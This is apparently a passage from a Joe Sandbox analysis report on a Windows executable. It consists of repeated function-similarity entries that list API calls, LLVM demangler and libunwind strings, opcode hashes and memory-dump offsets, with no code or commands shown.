                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: mallocmemcpystrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 3344349799-3503049562
                                      • Opcode ID: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
                                      • Instruction ID: 47f4c820850cf641a22684a9b361f58d95e41f43f662923e02467d4006ee0e2f
                                      • Opcode Fuzzy Hash: 411cc94d638b4c5a65666b04f682356d8a7e8c8d03e2840adf31fc5fabca7cb3
                                      • Instruction Fuzzy Hash: 2C41506260AB0682EE759F16A94026E63A6EB45780F680435DA8E87BA3DF3CE145C354
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$_assert
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/Utility.h$CurrentPosition
                                      • API String ID: 940201557-3339543485
                                      • Opcode ID: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
                                      • Instruction ID: 27f962b13596cc8f078ecdd261ce1ef6495d58678ae05c89896959d4e23a34ee
                                      • Opcode Fuzzy Hash: 7acef73fbec41d6dfa1be67c13337ccc807f794cd771a4b3e4e2917c685efc0b
                                      • Instruction Fuzzy Hash: FE4143B6A09F4682EF29CF56E8942797762EB58BC0F588532CB8E47795DF7CE4418300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memsetwcscatwcscpywcslen
                                      • String ID: $0$@
                                      • API String ID: 468205783-2347541974
                                      • Opcode ID: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
                                      • Instruction ID: 22e9c73a20de05424861a3b3f8d67ec94616e937b825c3e9686835733f808c96
                                      • Opcode Fuzzy Hash: e183844e820dd185498d54a444cfdf65eda0e2a936280ba6ff7fda81fa3f1c34
                                      • Instruction Fuzzy Hash: 8041AF6191E68281F310CF25F4443BAB762FB85784F280135EA8D92FAADFBDD145CB01
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assertmemcpyrealloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basic_string$starts_with(SV, "basic_")
                                      • API String ID: 2326172077-800580732
                                      • Opcode ID: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
                                      • Instruction ID: 03b04dcdd88393934ee555b68700cffb99e96b4152d8eceddd9c6e532245b201
                                      • Opcode Fuzzy Hash: 1cf50003512e3ea4dae628e96ebf30add7ca9d163f89edfb160867659c8d9a78
                                      • Instruction Fuzzy Hash: 000184F2F0AA4292EA149F59F9C12796363EF647C4F684431C64D87796EF2CE591C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$reallocstrlen
                                      • String ID:
                                      • API String ID: 2374275640-0
                                      • Opcode ID: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
                                      • Instruction ID: c3e22d827279a97cc0adcb2ee7e430465fcce223d3c840f190cffd0a5f945d4e
                                      • Opcode Fuzzy Hash: 9fcff9b977f65c3a391a145938d85213577a97e659ce38ebb67324265da1d897
                                      • Instruction Fuzzy Hash: 6CC116A260ABC546EB158F25D4503AD67A2EB45B81F2C8A31CB9D873D7DF3CE592C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
                                      • Instruction ID: da55d10447b6f7864f5fd05d3b58222a84bc8186100f95d7928c44da8f1806e3
                                      • Opcode Fuzzy Hash: 30d2cb59483826d978f11d2be31c172a2ece989509a146521bc4926f218ec95d
                                      • Instruction Fuzzy Hash: C45175F2A06B4683DF249F57E85026DA362EB54BC4F188932CB9E47792DF3CE4518340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
                                      • Instruction ID: fdf6928f42ed6c57424d58dd4353ecc6683339cac44818781755236ac6bc65eb
                                      • Opcode Fuzzy Hash: d16cc2fde265a49c118596b96dd5b5cfa61d07f1c591749a92ff39ed06f51163
                                      • Instruction Fuzzy Hash: 3D5152B2A06B4683DA25DF56F95026DB3A6FB68BC0F548535DB8E47792EF3CE4418300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$memcpy
                                      • String ID:
                                      • API String ID: 1833655766-0
                                      • Opcode ID: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
                                      • Instruction ID: 1036f591e5baa2124e9ff004c431dcee7545cf083beb7ef0d9bb6041e3101d42
                                      • Opcode Fuzzy Hash: 6905e7ca18b6a58da2f216068c29ad50521c822ba058662085adb930a16d6f30
                                      • Instruction Fuzzy Hash: C25175F6A05B4683DE298F16E85026DA362FB58BC4F588531CF8E47792EF3CE4518300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                      • String ID:
                                      • API String ID: 3326252324-0
                                      • Opcode ID: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
                                      • Instruction ID: be3928a89caa81d47c3c7bb8081862e6b91dd6d5178e5f14464b6790b5471160
                                      • Opcode Fuzzy Hash: 08f0997568cc7a319e12c3eb93543c3c92b5c3fd4d446526cdcdb6b294db1472
                                      • Instruction Fuzzy Hash: 0921EA24E0E90282F6559F51EA543742373BF45BA0FB90031DE4EC77A6EF6DA846C340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$malloc
                                      • String ID: vector[$pixel ve
                                      • API String ID: 454241450-4216275618
                                      • Opcode ID: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
                                      • Instruction ID: 6f837b6fa5207789982573507e30c2478b0c3bca4b53d002aafdf08e2d69976c
                                      • Opcode Fuzzy Hash: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
                                      • Instruction Fuzzy Hash: 1841C4B2A05B8582DA14CF16E84466D77B6FB58BC0F188931DF9D4B7A2DF3CD5928300
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$_assertstrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 3012236610-3503049562
                                      • Opcode ID: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
                                      • Instruction ID: c1a2ccc6537324d17117ff08f86b30a328a8146d79d2bdd3fc928e3d263a06df
                                      • Opcode Fuzzy Hash: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
                                      • Instruction Fuzzy Hash: C8411533616B8185EB11CF19E4447A837A9FB04B91F2A4635DF5C4B7A2DF38E692C310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: > typena$ame $template
                                      • API String ID: 471065373-2892875084
                                      • Opcode ID: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
                                      • Instruction ID: fe557e421afb96a62c590adb7c7d76119d05ccdd9453d919cba25bcce1875378
                                      • Opcode Fuzzy Hash: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
                                      • Instruction Fuzzy Hash: F1317CF2A06B9583EA29DF06E9841696762FB98BC0F148531CF9D477A5EF38D5928300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: &$sizeof..
                                      • API String ID: 471065373-1098962357
                                      • Opcode ID: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
                                      • Instruction ID: 63792dc823b4a6b55b2c5e9cb36a8f5ec52e1ea13dcb457704a5381488ad230c
                                      • Opcode Fuzzy Hash: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
                                      • Instruction Fuzzy Hash: C0318FB2A06B8683DB259F56F4942ADB3A2EB647C4F548531DB8E47796EF3CE441C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: restric$ volatil
                                      • API String ID: 471065373-3617781792
                                      • Opcode ID: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
                                      • Instruction ID: 8b1abe2b4712361f884505044c9573e9627d152dcd8d40283222477c43410023
                                      • Opcode Fuzzy Hash: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
                                      • Instruction Fuzzy Hash: 3A413EB2A06F8683DA29CF46E55426D7762EB94BC4F148431DB9E477A1EF3CE841C340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflush
                                      • String ID: CCG $libunwind: __libunwind_seh_personality() LanguageHandler returned %d$libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p)
                                      • API String ID: 497872470-3214979313
                                      • Opcode ID: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
                                      • Instruction ID: ced1a6f690dfb362ca5daab442c80db70365666785fc27852ee53d71f0c5e9c5
                                      • Opcode Fuzzy Hash: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
                                      • Instruction Fuzzy Hash: 3A31A226E0974182EB10EF65E5453BD6372FB98780F284136DE8E87796EF3CD4458340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_string$starts_with(SV, "basic_")
                                      • API String ID: 1222420520-1046023109
                                      • Opcode ID: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
                                      • Instruction ID: 0241fdda7b7d7966225820c9e4a2616e93093c74e9bbd98d910ed8935f1d7caa
                                      • Opcode Fuzzy Hash: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
                                      • Instruction Fuzzy Hash: 59F0E9B1B0AA12C1E6608F08E880B3873A2EB58B74F78C330C52C83BD1DE2D9516C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$freememcpy
                                      • String ID:
                                      • API String ID: 2038854750-0
                                      • Opcode ID: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
                                      • Instruction ID: b37f716ecac6c16000610693a70422762bb55a0b1887810332b8f3148f9d2521
                                      • Opcode Fuzzy Hash: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
                                      • Instruction Fuzzy Hash: 3E9181A2A09A4692EF188F16D95437967A3FB69BC4F288831CF4D87796DF3CD456C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
